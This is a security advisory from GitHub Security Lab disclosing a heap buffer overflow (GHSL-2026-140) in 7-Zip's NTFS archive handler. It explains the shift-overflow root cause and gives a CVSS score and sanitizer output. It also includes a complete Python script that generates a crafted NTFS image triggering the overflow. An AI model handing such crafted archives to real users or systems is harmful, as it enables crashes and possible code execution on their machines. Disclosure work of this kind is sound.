Coordinated Disclosure Timeline

Summary

A heap buffer overflow vulnerability (GHSL-2026-140) exists in 7-Zip version 26.00. It is caused by an under-allocation of the NTFS compressed stream buffer (GetCuSize shift UB) and may allow an attacker to crash the application or execute arbitrary code.

Project

7-Zip

Tested Version

v26.00

Details

Heap buffer overflow via NTFS compressed stream buffer under-allocation (GetCuSize shift UB) (GHSL-2026-140)

A heap buffer overflow vulnerability exists in the NTFS archive handler in 7-Zip that can lead to code execution via vtable hijack. The CInStream::GetCuSize() function computes the NTFS compression-unit buffer size using a 32-bit shift (UInt32)1 << (BlockSizeLog + CompressionUnit). When an attacker-crafted NTFS image sets ClusterSizeLog >= 28 (accepted by the parser) and a compressed data attribute with CompressionUnit == 4, the shift exponent reaches 32 — undefined behavior in C++. On both x86 and x64, the UB causes _inBuf to be allocated as 1 byte. The subsequent ReadStream_FALSE writes 256 MB of attacker-controlled data into this 1-byte buffer.

The NTFS boot sector parser accepts cluster sizes up to 2^30 bytes (CPP/7zip/Archive/NtfsHandler.cpp, line 133):

// NtfsHandler.cpp, lines 122-134
const unsigned v = p[13];
if (v <= 0x80)
{
  const int t = GetLog(v);
  if (t < 0) return false;
  sectorsPerClusterLog = (unsigned)t;
}
else
  sectorsPerClusterLog = 0x100 - v;
ClusterSizeLog = SectorSizeLog + sectorsPerClusterLog;
if (ClusterSizeLog > 30)        // allows 28, 29, 30
  return false;
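
The check above can be re-traced outside 7-Zip. The following is a minimal Python sketch, not the project's code: get_log is a hypothetical stand-in for GetLog (assumed to return log2 for powers of two and -1 otherwise), and reading the sector size from bytes 11-12 is an assumption based on where the PoC writes the value 512.

```python
def get_log(v: int) -> int:
    """Hypothetical stand-in for GetLog: log2(v) for powers of two, else -1."""
    if v <= 0 or v & (v - 1):
        return -1
    return v.bit_length() - 1


def cluster_size_log(boot: bytes):
    """Mirror the quoted check; return ClusterSizeLog, or None if rejected."""
    # Assumption: the sector size is the little-endian 16-bit value at offset 11.
    sector_size_log = get_log(int.from_bytes(boot[11:13], "little"))
    if sector_size_log < 0:
        return None
    v = boot[13]
    if v <= 0x80:
        t = get_log(v)
        if t < 0:
            return None
        sectors_per_cluster_log = t
    else:
        sectors_per_cluster_log = 0x100 - v
    log = sector_size_log + sectors_per_cluster_log
    return None if log > 30 else log


def make_boot(sector_size: int, byte13: int) -> bytes:
    """Build a 512-byte buffer carrying only the two fields used above."""
    boot = bytearray(512)
    boot[11:13] = sector_size.to_bytes(2, "little")
    boot[13] = byte13
    return bytes(boot)
```

With 512-byte sectors, a byte-13 value of 0xED gives 9 + (0x100 - 0xED) = 28, which passes the `> 30` test. That is the value the PoC uses.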

Non-resident compressed data attributes carry CompressionUnit from the attacker-controlled attribute header (NtfsHandler.cpp:509). The value CompressionUnit == 4 is explicitly accepted (NtfsHandler.cpp:430).

The compressed stream’s buffer size is computed as:

// NtfsHandler.cpp, line 687
UInt32 GetCuSize() const { return (UInt32)1 << (BlockSizeLog + CompressionUnit); }

When BlockSizeLog == 28 and CompressionUnit == 4, the exponent is 32, which is undefined behavior (shift by >= type width). On x86, (UInt32)1 << 32 typically yields 1 due to hardware masking of shift counts.
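
To make the arithmetic concrete, here is a small Python model of the shift. It assumes the typical x86 behavior of masking a 32-bit shift count to its low 5 bits. Because the C++ operation is undefined, a compiler is free to produce something else, so treat this as an illustration of one common outcome rather than a guarantee. The function names are hypothetical.

```python
UINT32_MASK = 0xFFFFFFFF


def shl32_x86(value: int, count: int) -> int:
    """Model a 32-bit x86 left shift: the count is masked to 5 bits."""
    return (value << (count & 31)) & UINT32_MASK


def get_cu_size_modeled(block_size_log: int, compression_unit: int) -> int:
    """Modeled result of (UInt32)1 << (BlockSizeLog + CompressionUnit)."""
    return shl32_x86(1, block_size_log + compression_unit)


def get_cu_size_intended(block_size_log: int, compression_unit: int) -> int:
    """Mathematically intended size, with no 32-bit truncation."""
    return 1 << (block_size_log + compression_unit)
```

For BlockSizeLog == 28 and CompressionUnit == 4 the intended size is 2^32 bytes, while the modeled 32-bit result is 1. For an ordinary volume (BlockSizeLog == 12) both functions agree on 65536.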

The undersized buffer is then used:

// NtfsHandler.cpp, lines 695-697
UInt32 cuSize = GetCuSize();     // UB → 1 byte on x86/x64
_inBuf.Alloc(cuSize);           // allocates 1 byte
_outBuf.Alloc(kNumCacheChunks << _chunkSizeLog);  // x86: 2 bytes; x64: 8 GB (succeeds on >= 16 GB RAM)

NTFS uses LZNT1 compression. The two buffers serve a standard decompress pipeline:

The normal flow is: disk → _inBuf → Lznt1Dec() → _outBuf → memcpy to caller. Both buffers should be GetCuSize() bytes (one compression unit). Due to the shift UB, _inBuf gets 1 byte instead of the intended size, so the very first step (reading compressed data from disk into _inBuf) overflows:

// NtfsHandler.cpp, lines 940-941
const size_t compressed = (size_t)numChunks << BlockSizeLog;  // up to 256 MB
RINOK(ReadStream_FALSE(Stream, _inBuf + offs, compressed))    // writes into 1-byte buffer

Note that the overflow target is _inBuf, not _outBuf. On x64, even when the 8 GB _outBuf allocation succeeds, the 1-byte _inBuf is still overflowed: the two buffer sizes are computed independently, and only the _inBuf size comes from the 32-bit GetCuSize() shift.
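
The size of the out-of-bounds write follows directly from the two quoted lines. The sketch below is plain arithmetic in Python. The value num_chunks = 1 is an assumption chosen to match the PoC's single-cluster run, and overflow_bytes is a hypothetical helper name.

```python
def overflow_bytes(num_chunks: int, block_size_log: int,
                   in_buf_size: int, offs: int = 0) -> int:
    """Bytes written past the end of a buffer of in_buf_size bytes."""
    read_len = num_chunks << block_size_log  # mirrors numChunks << BlockSizeLog
    return max(0, offs + read_len - in_buf_size)


# One 256 MB cluster read into the 1-byte buffer.
past_end = overflow_bytes(num_chunks=1, block_size_log=28, in_buf_size=1)
```

Under these assumptions the read exceeds the allocation by 2^28 - 1 bytes. With a correctly sized buffer of 2^32 bytes, the same call returns 0.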

Platform-dependent behavior

On 32-bit builds, (size_t)2 << 32 is also UB (size_t is 32-bit), yielding 2 via hardware masking. Both _inBuf.Alloc(1) and _outBuf.Alloc(2) succeed with tiny allocations, and the heap overflow is unconditionally reached.

On 64-bit builds, (size_t)2 << 32 is a valid 64-bit shift yielding 8,589,934,592 (8 GB). The _outBuf.Alloc(8 GB) call succeeds on systems with sufficient RAM (confirmed on a 64 GB machine). After the allocation succeeds, execution proceeds to ReadStream_FALSE and the same heap overflow occurs. On low-memory systems, the allocation may fail with CNewException, limiting the impact to DoS.
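
The difference between the two builds can be modeled in a few lines of Python. This is a sketch, not 7-Zip code: the operands 2 and 32 are taken from the (size_t)2 << 32 expression above, and the 32-bit case again assumes the hardware masks the shift count, which the C++ standard does not guarantee.

```python
def shl_size_t(value: int, count: int, size_t_bits: int) -> int:
    """Model a left shift on a size_t of the given width.

    Assumption: the shift count is masked to the operand width, as x86
    hardware does. For counts below the width this is the defined result.
    """
    mask = (1 << size_t_bits) - 1
    return (value << (count & (size_t_bits - 1))) & mask


out_buf_32 = shl_size_t(2, 32, 32)  # 32-bit build: count wraps to 0
out_buf_64 = shl_size_t(2, 32, 64)  # 64-bit build: ordinary shift
```

The model gives 2 bytes for the 32-bit build and 8,589,934,592 bytes for the 64-bit build, matching the figures above.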

Impact

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.8 (High)
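
As a cross-check, the 8.8 score can be recomputed from the vector using the CVSS v3.1 base-score equations. The sketch below is a minimal Python implementation that handles only Scope: Unchanged vectors. The function and table names are illustrative.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(x: float) -> float:
    """Round up to one decimal place, as defined in CVSS v3.1."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector with S:U."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {k: WEIGHTS[k][metrics[k]] for k in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    if impact <= 0:
        return 0.0
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    return roundup(min(impact + exploitability, 10))


score = base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H")
```

The impact sub-score is about 5.87 and the exploitability sub-score about 2.84. Their sum, roughly 8.71, rounds up to 8.8.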

Affected versions: The GetCuSize() computation has been present since NTFS compressed stream support was introduced. All versions through 26.00 are affected.

CWEs

Resources

PoC generator (gen_ntfs_sparse.py) — generates poc_ntfs_sparse.ntfs (512 MB sparse NTFS image, ~8 KB actual data):

#!/usr/bin/env python3
"""Generate a sparse NTFS image with ClusterSizeLog=28 and a compressed
$DATA attribute with CompressionUnit=4 to trigger GetCuSize() UB."""
import os
import struct
import sys

boot = bytearray(512)
boot[0:3] = b'\xEB\x52\x90'
boot[3:11] = b'NTFS    '
struct.pack_into('<H', boot, 11, 512)
boot[13] = 0xED  # ClusterSizeLog = 28
for i in range(14, 21): boot[i] = 0
boot[21] = 0xF8
struct.pack_into('<H', boot, 24, 63)
struct.pack_into('<H', boot, 26, 255)
struct.pack_into('<Q', boot, 40, 2 << 19)  # TotalSectors
struct.pack_into('<Q', boot, 48, 1)  # MftCluster=1 -> offset 256MB
boot[64] = 0xF6
boot[68] = 0xF6
struct.pack_into('<Q', boot, 72, 0x1234567890ABCDEF)
boot[510] = 0x55; boot[511] = 0xAA

MFT_REC = 1024

def mft_rec(seq, flags, attrs, rec_num=0):
    r = bytearray(MFT_REC)
    r[0:4] = b'FILE'
    struct.pack_into('<H', r, 4, 0x30)   # UpdateSequenceOffset
    struct.pack_into('<H', r, 6, 3)      # UpdateSequenceSize
    struct.pack_into('<Q', r, 8, 0)
    struct.pack_into('<H', r, 16, seq)
    struct.pack_into('<H', r, 18, 1)
    struct.pack_into('<H', r, 20, 0x38)
    struct.pack_into('<H', r, 22, flags)
    bytes_in_use = (0x38 + len(attrs) + 8 + 7) & ~7
    struct.pack_into('<I', r, 24, bytes_in_use)
    struct.pack_into('<I', r, 28, MFT_REC)
    struct.pack_into('<I', r, 0x2C, rec_num)
    r[0x38:0x38+len(attrs)] = attrs
    struct.pack_into('<I', r, 0x38+len(attrs), 0xFFFFFFFF)
    usn = 0x0001
    struct.pack_into('<H', r, 0x30, usn)
    orig0 = struct.unpack_from('<H', r, 510)[0]
    orig1 = struct.unpack_from('<H', r, 1022)[0]
    struct.pack_into('<H', r, 0x32, orig0)
    struct.pack_into('<H', r, 0x34, orig1)
    struct.pack_into('<H', r, 510, usn)
    struct.pack_into('<H', r, 1022, usn)
    return r

def std_info():
    d = bytearray(48)
    a = bytearray(24 + len(d))
    struct.pack_into('<I', a, 0, 0x10)
    struct.pack_into('<I', a, 4, len(a))
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(d))
    a[24:24+len(d)] = d
    return a

def filename(name):
    nu = name.encode('utf-16-le')
    fn = bytearray(66 + len(nu))
    struct.pack_into('<Q', fn, 0, 5)
    fn[64] = len(name)
    fn[65] = 3
    fn[66:66+len(nu)] = nu
    raw_len = 24 + len(fn)
    padded_len = (raw_len + 7) & ~7
    a = bytearray(padded_len)
    struct.pack_into('<I', a, 0, 0x30)
    struct.pack_into('<I', a, 4, padded_len)
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(fn))
    a[24:24+len(fn)] = fn
    return a

def compressed_data():
    rl = bytes([0x11, 0x01, 0x01, 0x00])  # 1 cluster at LCN 1
    hdr_size = 0x48
    sz = (hdr_size + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 0x10, 0)     # LowVcn
    struct.pack_into('<Q', a, 0x18, 0)     # HighVcn
    struct.pack_into('<H', a, 0x20, hdr_size)  # RunlistOffset
    a[0x22] = 4                            # CompressionUnit = 4
    cs = 1 << 28
    struct.pack_into('<Q', a, 0x28, cs)    # AllocatedSize
    struct.pack_into('<Q', a, 0x30, 100)   # Size
    struct.pack_into('<Q', a, 0x38, 100)   # InitializedSize
    struct.pack_into('<Q', a, 0x40, cs)    # PackSize
    a[hdr_size:hdr_size+len(rl)] = rl
    return a

def mft_data_attr(num_records):
    rl = bytes([0x11, 0x01, 0x01, 0x00])
    sz = (72 + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 16, 0)
    struct.pack_into('<Q', a, 24, 0)
    struct.pack_into('<H', a, 32, 0x40)
    struct.pack_into('<H', a, 34, 0)       # CompressionUnit = 0
    data_size = num_records * MFT_REC
    struct.pack_into('<Q', a, 40, 1 << 28)
    struct.pack_into('<Q', a, 48, data_size)
    struct.pack_into('<Q', a, 56, data_size)
    a[0x40:0x40+len(rl)] = rl
    return a

num_mft_records = 7
mft  = mft_rec(1, 1, std_info() + mft_data_attr(num_mft_records), rec_num=0)
for i in range(1, 5):
    mft += mft_rec(i+1, 1, std_info(), rec_num=i)
mft += mft_rec(1, 3, std_info(), rec_num=5)  # root dir
mft += mft_rec(1, 1, std_info() + filename("test.txt") + compressed_data(), rec_num=6)

mft_off = 1 << 28   # 256 MB
phy_size = 2 << 28   # 512 MB
out = sys.argv[1] if len(sys.argv) > 1 else "poc_ntfs_sparse.ntfs"
with open(out, 'wb') as f:
    f.write(boot)
    f.seek(mft_off)
    f.write(mft)
    f.seek(phy_size - 1)
    f.write(b'\x00')

print(f"Generated: {out} ({os.stat(out).st_size} bytes apparent)")

Usage: python3 gen_ntfs_sparse.py [output_path]
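
To confirm that a generated image is sparse, the apparent size can be compared with the space actually allocated on disk. The following is a small Python sketch with hypothetical helper names. It relies on st_blocks, which is only available on POSIX systems and is reported in 512-byte units. Whether the file is stored sparsely also depends on the filesystem.

```python
import os


def sparse_sizes(path):
    """Return (apparent_bytes, allocated_bytes) for a file.

    allocated_bytes is None where st_blocks is unavailable (e.g. Windows).
    """
    st = os.stat(path)
    blocks = getattr(st, "st_blocks", None)  # POSIX only, 512-byte units
    allocated = blocks * 512 if blocks is not None else None
    return st.st_size, allocated


def write_sparse(path, size):
    """Create a file of `size` bytes by seeking past the end, as the PoC does."""
    with open(path, "wb") as f:
        f.seek(size - 1)
        f.write(b"\x00")
```

Calling sparse_sizes("poc_ntfs_sparse.ntfs") after running the generator should report an apparent size of 512 MB. On a filesystem with sparse-file support the allocated size is expected to be far smaller.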

The PoC constructs a hand-crafted NTFS image with ClusterSizeLog = 28 (256 MB clusters), 7 MFT records at offset 256 MB, and a compressed $DATA attribute with CompressionUnit = 4. No existing NTFS formatting tool (mkntfs) supports clusters larger than 64 KB, so the entire MFT structure is synthesized from scratch.

Verification

Confirmed with UBSan.

UBSan (clang, Linux x64, recovery mode)

Confirms the root-cause shift UB regardless of platform:

../../Archive/NtfsHandler.cpp:687:47: runtime error: shift exponent 32 is too large
    for 32-bit type 'UInt32' (aka 'unsigned int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
    ../../Archive/NtfsHandler.cpp:687:47

After the UB, cascading corruption leads to a SEGV:

../../Common/StreamUtils.cpp:62:27: runtime error: member call on address 0x5d3dd8f776f0
    which does not point to an object of type 'ISequentialInStream'
    note: object has invalid vptr
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==60==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000018
==60==Hint: address points to the zero page.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2026-140 in any communication regarding this issue.